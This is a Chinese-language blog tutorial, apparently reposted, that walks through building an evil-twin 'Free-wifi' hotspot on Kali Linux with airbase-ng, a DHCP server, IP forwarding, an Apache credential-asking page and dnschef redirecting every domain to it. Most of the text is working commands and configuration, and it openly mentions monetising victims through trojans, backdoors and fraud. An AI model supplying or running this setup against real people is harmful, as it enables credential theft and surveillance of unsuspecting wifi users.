钓鱼网站源码(分享一个搭建钓鱼wifi的案例)

现在日常生活中wifi使用现象比较普遍,以前还流行过一段时间破解wifi的工具,或者共享wifi的工具。但是这些陌生人的wifi其实都存在一定的安全隐患,说不定就存在钓鱼wifi,这里就介绍一下搭建钓鱼wifi的操作。

搭建钓鱼wifi的原理其实比较简单,具体实施以前没接触过感觉会有点麻烦,只要实操几遍,也就感觉so easy了。而且真正要用钓鱼wifi做黑产的话,难的也不是搭建钓鱼wifi,而是鱼吃钩之后,怎么将鱼钓上岸,既获取鱼的信息、给鱼植入木马、给鱼留个后门,真正要用将鱼转换成收入,还要经过好几次转换呢,比较常见的就是利用鱼的信息、后门进行诈骗。

钓鱼wifi原理示意图

我使用的是kali系统,所以后面的操作也都是在kali系统基础上的,如果你用centOS,或者其他Linux系统,可能需要将命令转换一下。

安装DHCP服务

这个比较简单,直接一个命令完成:

apt install isc-dhcp-server

因为我前面已经安装过了,执行之后就是这样的:

apt install isc-dhcp-server

将网卡切换到监听模式并创建热点

如果你是虚拟机,就需要安装compat-wireless来生成wlan,最好是真机,虚拟机会导致后续wifi使用的一些问题。

将wlan0切换到监听模式:

airmon-ng start wlan0

airmon-ng start wlan0

如果要看是否启动成功,可以用ifconfig看一下有没有wlan0mon出现。

ifconfig

创建热点的命令也很简单,-e参数后面的值是热点名称:

airbase-ng -e "Free-wifi" -c 6 wlan0mon

airbase-ng -e "Free-wifi" -c 6 wlan0mon

开启成功后,这个窗口不要关闭。后续的动作到新窗口中操作。

建立虚拟网卡并打开IP转发功能

这一步的意义是将这张网卡的流量转发到虚拟网卡上:

# 建立虚拟网卡
ifconfig at0 up
# 给虚拟网卡配置ip和掩码
ifconfig at0 192.168.2.1 netmask 255.255.255.0
# 给虚拟网卡配置路由和网关
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
# 设置允许数据包转发,默认是0,代表不允许本机网卡之间转发数据包,每次启动都会恢复默认值0
echo 1 > /proc/sys/net/ipv4/ip_forward

配置DHCP服务器

使用dhcpd来作为DHCP服务器,需要改一下配置文件,命令如下:

vi /etc/dhcp/dhcpd.conf

将这些内容写入配置文件,其中注解可以不写入:

ddns-update-style none;
authoritative;
# 默认租约时间
default-lease-time 700;
# 设置最大租约时间
max-lease-time 8000;
# 设置子网属性,netmask关键字指定子网掩码
subnet 192.168.2.0 netmask 255.255.255.0 {
# 指定为客户机分配的默认网关地址
option routers 192.168.2.1;
# 指定为客户机分配的子网掩码地址
option subnet-mask 255.255.255.0;
# 设置DNS服务器地址
option domain-name-servers 192.168.2.1;
# 设置动态分配的IP地址范围
range 192.168.2.20 192.168.2.240;
}

更改配置文件

配置完成,就该启动dhcp服务了:

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0

出现这些信息,就表示启动成功了:

启动服务

到这一步,其实已经完成了钓鱼wifi的搭建,但是单纯给别人提供一个公共wifi,就真变成慈善行为了。

搭建钓鱼网站

这里使用kali自带的apache搭建一个钓鱼网站,默认是在/var/www/html/目录,只需要将钓鱼网站的源码放在这里就可以。

这里教程就随便新建一个index.html做测试用

<font size="200" color="red"> Hello!!! </font>
<br><br>
<font size="20" face="verdana" color="green">Can you tell me your account and password???</font>

启动apache服务:

service apache2 start

钓鱼网站

启动成功后,其他人是不会主动访问你的钓鱼网站的,所以我们要做一些配置,让使用我们钓鱼wifi的人访问网络时,能够跳转到我们的钓鱼网站。

劫持DNS

要让连到我们钓鱼WIFI的人访问这个钓鱼网页,只需要设置一下DNS解析。前面DHCP分配ip的时候就已经把DNS服务器指向我们了,这里就不需要重新搭建DNS服务器,使用dnschef这个工具就可以。

dnschef -i 192.168.2.1 --fakeip 192.168.2.1

这条命令的作用是监听192.168.2.1并将所有域名泛解析成192.168.2.1也就是本地。

劫持DNS

钓鱼效果

这个时候就可以用手机连接前面那个钓鱼wifi了,连接成功后,打开网页,就会发现访问的任何网页,就会跳转到钓鱼网页里。

当然这里演示的钓鱼方式都比较糙,实际作案中就算用钓鱼网站肯定也会做更精致一些的。

声明:去钓鱼所有作品(图文、音视频)均由用户自行上传分享,仅供网友学习交流,版权归原作者会测试的鲸鱼所有,原文出处。若您的权利被侵害,请联系 删除。

本文链接:https://www.qudiaoyu.com/b/19369.html